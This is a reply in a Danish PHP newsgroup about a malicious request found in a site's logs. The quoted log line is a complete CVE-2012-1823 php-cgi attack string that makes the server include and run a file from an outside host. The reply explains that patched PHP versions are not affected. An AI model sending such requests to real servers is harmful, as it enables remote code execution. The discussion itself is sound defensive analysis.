Groups | Search | Server Info | Login | Register

Groups > dk.edb.internet.webdesign.serverside.php > #7254

Re: Ondsindet request

From Jan Hansen <jhjjhjhhansen@gmail.com>
Newsgroups dk.edb.internet.webdesign.serverside.php
Subject Re: Ondsindet request
Date 2020-04-15 14:19 +0200
Organization A noiseless patient Spider
Message-ID <20200415141906.726ca602f38e2a74861b5b75@gmail.com> (permalink)
References <1tdp12me6kivq.dlg@lundhansen.dk>

Show all headers | View raw

Bertel Lund Hansen skrev:

> Jeg er ved at lege med lidt statistik på Fidusos sider, og i den
> forbindelse aflæste jeg bl.a. $_SERVER['REQUEST_URI']. Jeg skrev
> de fundne data til en tekstfil som jeg så vil bearbejde med et
> statistikprogram.
> 
> I datafilen forekom så følgende request:
> /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://tenderplus.spb.ru//components/com_foxcontact/default.txt

Hvis du bruger php 5.4.3 eller nyere på det domæne, sker der ikke 
noget ved det. Fra <https://www.cvedetails.com/cve/CVE-2012-1823>:
"sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, 
when configured as a CGI script (aka php-cgi), does not properly 
handle query strings that lack an = (equals sign) character, which 
allows remote attackers to execute arbitrary code by placing 
command-line options in the query string, related to lack of 
skipping a certain php_getopt for the 'd' case. ".



-- 
mvh Jan.
Help Microsoft stamp out piracy. Give
Linux to a friend today!

Back to dk.edb.internet.webdesign.serverside.php | Previous | NextPrevious in thread | Next in thread | Find similar

Thread

Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-14 22:00 +0200
  Re: Ondsindet request Arne Vajhøj <arne@vajhoej.dk> - 2020-04-14 16:19 -0400
    Re: Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 09:13 +0200
      Re: Ondsindet request Martin Larsen <martin+spamfree+larsen@bigfoot.com> - 2020-04-15 10:16 +0200
      Re: Ondsindet request Arne Vajhøj <arne@vajhoej.dk> - 2020-04-15 08:30 -0400
        Re: Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 16:41 +0200
          Re: Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 16:43 +0200
  Re: Ondsindet request Jan Hansen <jhjjhjhhansen@gmail.com> - 2020-04-15 14:19 +0200
    Re: Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 16:38 +0200

csiph-web